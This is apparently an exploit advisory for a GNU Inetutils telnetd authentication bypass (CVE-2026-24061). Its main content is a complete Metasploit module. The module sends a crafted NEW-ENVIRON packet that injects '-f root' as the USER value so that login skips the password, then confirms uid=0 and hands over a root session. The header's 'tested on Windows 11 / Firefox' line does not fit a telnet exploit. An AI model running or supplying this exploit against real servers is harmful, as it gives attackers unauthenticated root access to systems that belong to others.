============================================================================================================================================= | # Title : GNU Inetutils telnetd NEW-ENVIRON Authentication Bypass Root Access | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.gnu.org/software/inetutils/ | ============================================================================================================================================= [+] Summary : A critical authentication bypass vulnerability has been identified in GNU Inetutils specifically affecting the telnetd service. The issue occurs due to improper validation of the NEW-ENVIRON Telnet subnegotiation option. By sending a specially crafted environment variable containing the value -f root within the USER field, a remote attacker can force the service to invoke the system login process in a way that bypasses password authentication. Successful exploitation allows an unauthenticated remote attacker to gain root-level access over Telnet without providing valid credentials. The vulnerability is tracked as: CVE-2026-24061 Impact Remote unauthenticated root access No brute force required No valid credentials required Full system compromise possible Severity Critical – Pre-Authentication Remote Code Execution / Privilege Escalation [+] POC : ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Telnet def initialize(info = {}) super(update_info(info, 'Name' => 'GNU Inetutils telnetd Authentication Bypass (Enhanced)', 'Description' => %q{ This module exploits an authentication bypass vulnerability in GNU Inetutils telnetd. By sending a specially crafted NEW-ENVIRON subnegotiation with a USER variable containing '-f root', an attacker can login as root without a password. This occurs because telnetd passes the environment variable directly to the login command without proper sanitization. }, 'Author' => [ 'indoushka' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2026-24061' ] # ], 'Privileged' => true, 'Payload' => { 'Space' => 2000, 'BadChars' => "", }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 20 2026', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ IOC_IN_LOGS ] } )) register_options( [ Opt::RPORT(23), OptString.new('USER', [ true, "The target user to bypass (usually root)", 'root' ]) ]) end def exploit connect print_status("Waiting for server banner and negotiation...") banner = sock.get_once(-1, 5) if banner print_status("Target Banner: #{banner.strip}") end packet = "\xff\xfa\x27\x00" packet << "\x00USER" packet << "\x01-f #{datastore['USER']}" packet << "\xff\xf0" print_status("Sending bypass payload for user: #{datastore['USER']}...") sock.put(packet) Rex.sleep(1) sock.put("id\n") res = sock.get_once(-1, 5) if res && res =~ /uid=0/ print_good("Success! Authenticated as root (uid=0).") handler else print_error("Failed to bypass authentication. Server might be patched or using PAM sanitization.") end rescue ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT print_error("Connection failed.") ensure end end Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================